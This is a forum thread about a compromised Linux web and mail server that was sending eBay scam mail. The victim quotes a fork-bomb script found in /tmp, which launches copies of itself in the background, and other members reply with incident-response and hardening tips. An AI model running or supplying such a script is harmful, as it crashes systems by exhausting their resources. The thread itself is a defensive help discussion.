I've been hacked!

[mike0929]

I hope someone could give me some pointers, I found several strange files in the /tmp directory, one of the them has the following content, the name of the file is forkbomb.sh

Code:

####################################################################
# Hello,
#
# Welcome to this forkbombing program. This program has the potential
# to even bring the biggest mainframes to its knees. 
#
#####################################################################
#
# YOU ARE CRACKED!! THIS PROGRAM WILL KILL YOUR SPAMMING SERVER
# Your server was sending eBay scam mails because of an IRC botnet
# server running in /tmp. It is called sess_<something>; the
# botnet client itself is running in /tmp/sex, and is contained
# in /tmp/sex3.tgz
#####################################################################
#
# shut things down. 
#####################################################################
#
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &

I noticed that i was getting so many returned emails and I couldn't figure out why. Evidently these scripts were sending ebay scam emails from my server, some of the files are owned by apache and some by root, can someone tell me how they broke into my system, so I can protect myself? I am running a dns, web, mysql and sendmail server and I hope my customer information has not been compromised...
I don't mind reinstalling the system I have backups of all the information but I would like to know what I was doing wrong. There is another perl script that I cannot determine exactly everything that was being done I do not want to post it here because the code is a lot, if someone wants to take a look please let me know.

I would like to find out at what extend my system was damaged or compromised, can someone help?

Thank you guys.

[kkubasik]

First and most important step, view the /etc/passwd file and look for any suspicious users. Change all your passwords, and (if you have backups) removing users who you think aren't legitament. Look at your logs, if some of the files are owend by apache, its most likely the break-in occured through your webserver. Check the logs in /var/logs (or something similar) and generaly poke around. Some might be so large that itll be close to impossible to manualy look through them all (like httpd.access) but you should be able to get a general idea of where the breakin occured.

[mike0929]

Thank you for responding, I didn't feel comfortable and I went ahead and reinstalled the system again. I am really going to try to pay more attention to the security issues for now on. Thank you.

[Oppie]

Use logwatch. It goes through the logs and notices stuff like 403's and stuff from apache. And other logging software like sendmail and your diskspace. It is a good utility. It emails root user what it finds suspicous. I love it.

[bigtomrodney]

Rootkithunter / rkhunter is excellent. At least I think it is, never found a rootkit
I had a few more attempts at my ssh last night. I opened it for half an hour to test it, had a mate connecting, but someone else tried to get me. Good mind to post their IP up here......

Nah I'll resist

[twhiting9275]

While rkhunter/rootkithunter/logcheck/chkrootkit are all good, they probably wouldn't have picked this one up. The key here is keeping your public_html software secure, and knowing what it does. In addition, you should (at minimum) have a secure tmp partition, mounted noexec.
You might also check into mod_security and supportive rules.